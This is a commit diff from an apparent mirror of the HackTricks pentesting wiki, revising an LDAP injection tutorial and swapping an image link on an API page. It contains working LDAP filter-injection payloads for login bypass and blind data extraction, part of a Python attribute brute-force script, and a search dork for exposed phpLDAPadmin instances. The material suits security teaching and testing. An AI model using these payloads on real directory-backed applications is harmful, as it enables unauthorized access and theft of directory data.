mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 14:10:41 +00:00
GitBook: [master] 2 pages and 4 assets modified
This commit is contained in:
parent
c2b98f8fb4
commit
a24d4e91d6
6 changed files with 32 additions and 15 deletions
Binary file not shown.
Before Width: | Height: | Size: 73 KiB After Width: | Height: | Size: 96 KiB |
BIN
.gitbook/assets/image (536).png
Normal file
BIN
.gitbook/assets/image (536).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 96 KiB |
BIN
.gitbook/assets/image (537).png
Normal file
BIN
.gitbook/assets/image (537).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 73 KiB |
BIN
.gitbook/assets/image (538).png
Normal file
BIN
.gitbook/assets/image (538).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 205 KiB |
|
@ -27,30 +27,28 @@
|
||||||
**\(\|\)** = Absolute FALSE
|
**\(\|\)** = Absolute FALSE
|
||||||
|
|
||||||
For example:
|
For example:
|
||||||
\(&\(!\(objectClass=Impresoras\)\)\(uid=s\*\)\)
|
`(&(!(objectClass=Impresoras))(uid=s*))
|
||||||
\(&\(objectClass=user\)\(uid=\*\)\)
|
(&(objectClass=user)(uid=*))`
|
||||||
|
|
||||||
You can access to the database, and this can content information of a lot of different types.
|
You can access to the database, and this can content information of a lot of different types.
|
||||||
|
|
||||||
The backups of LDAP uses the extension _ldif_
|
|
||||||
|
|
||||||
**OpenLDAP**: If 2 filters arrive, only executes the first one.
|
**OpenLDAP**: If 2 filters arrive, only executes the first one.
|
||||||
**ADAM or Microsoft LDS**: With 2 filters they throw an error.
|
**ADAM or Microsoft LDS**: With 2 filters they throw an error.
|
||||||
**SunOne Directory Server 5.0**: Execute both filters.
|
**SunOne Directory Server 5.0**: Execute both filters.
|
||||||
|
|
||||||
**It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.**
|
**It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.**
|
||||||
|
|
||||||
The filter has to start with: _&_ or _\|_
|
The filter has to start with: `&` or `|`
|
||||||
Example: _\(&\(directory=val1\)\(folder=public\)\)_
|
Example: `(&(directory=val1)(folder=public))`
|
||||||
|
|
||||||
\(&\(objectClass=VALUE1\)\(type=Epson\*\)\)
|
`(&(objectClass=VALUE1)(type=Epson*))
|
||||||
VALUE1 = _\*\)\(ObjectClass=\*\)\)\(&\(objectClass=void_
|
VALUE1 = *)(ObjectClass=*))(&(objectClass=void`
|
||||||
|
|
||||||
Then: _\(&\(objectClass=**\*\)\(ObjectClass=\*\)\)**_ will be the first filter \(the one executed\).
|
Then: `(&(objectClass=`**`*)(ObjectClass=*))`** will be the first filter \(the one executed\).
|
||||||
|
|
||||||
## Login Bypass
|
## Login Bypass
|
||||||
|
|
||||||
LDAP supports several formats to store the password: clear, md5, smd5, sh1, ssha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
|
LDAP supports several formats to store the password: clear, md5, smd5, sh1, sha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
user=*
|
user=*
|
||||||
|
@ -92,7 +90,7 @@ password=pwd
|
||||||
```bash
|
```bash
|
||||||
username = admin)(!(&(|
|
username = admin)(!(&(|
|
||||||
pass = any))
|
pass = any))
|
||||||
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSO then the user is admin and the password check is True.
|
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
|
||||||
```
|
```
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
|
@ -107,12 +105,29 @@ password=any
|
||||||
--> (&(uid=admin)) (| (|) (webpassword=any))
|
--> (&(uid=admin)) (| (|) (webpassword=any))
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Lists
|
||||||
|
|
||||||
[LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt)
|
[LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt)
|
||||||
[LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)
|
[LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)
|
||||||
[LDAP\_authBypass](https://feelsec.info/wp-content/uploads/2018/11/LDAP_authBypass.txt)
|
|
||||||
|
|
||||||
## Blind LDAP Injection
|
## Blind LDAP Injection
|
||||||
|
|
||||||
|
You may force False or True responses to check if any data is returned and confirm a possible Blind LDAP Injection:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#This will result on True, so some information will be shown
|
||||||
|
Payload: *)(objectClass=*))(&objectClass=void
|
||||||
|
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
|
||||||
|
```
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#This will result on True, so no information will be returned or shown
|
||||||
|
Payload: void)(objectClass=void))(&objectClass=void
|
||||||
|
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
|
||||||
|
```
|
||||||
|
|
||||||
|
### Dump data
|
||||||
|
|
||||||
You can iterate over the ascii letters, digits and symbols:
|
You can iterate over the ascii letters, digits and symbols:
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
|
@ -130,7 +145,7 @@ You can iterate over the ascii letters, digits and symbols:
|
||||||
|
|
||||||
### **Discover valid LDAP fields**
|
### **Discover valid LDAP fields**
|
||||||
|
|
||||||
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of **\*\*\[**default LDAP attributes here**\]\(**[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP Injection/Intruder/LDAP\_attributes.txt](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**\)**.\*\*
|
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of [**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt).
|
||||||
|
|
||||||
```python
|
```python
|
||||||
#!/usr/bin/python3
|
#!/usr/bin/python3
|
||||||
|
@ -189,5 +204,7 @@ for i in range(50):
|
||||||
intitle:"phpLDAPadmin" inurl:cmd.php
|
intitle:"phpLDAPadmin" inurl:cmd.php
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## More Payloads
|
||||||
|
|
||||||
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection)
|
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection)
|
||||||
|
|
||||||
|
|
|
@ -25,7 +25,7 @@ These kind of APIs may be [**vulnerable to XXE**](../../pentesting-web/xxe-xee-x
|
||||||
|
|
||||||
You could also try to use CDATA tags to insert payloads \(as long as the XML is valid\)
|
You could also try to use CDATA tags to insert payloads \(as long as the XML is valid\)
|
||||||
|
|
||||||
![](../../.gitbook/assets/image%20%28535%29.png)
|
![](../../.gitbook/assets/image%20%28537%29.png)
|
||||||
|
|
||||||
### Check Access
|
### Check Access
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue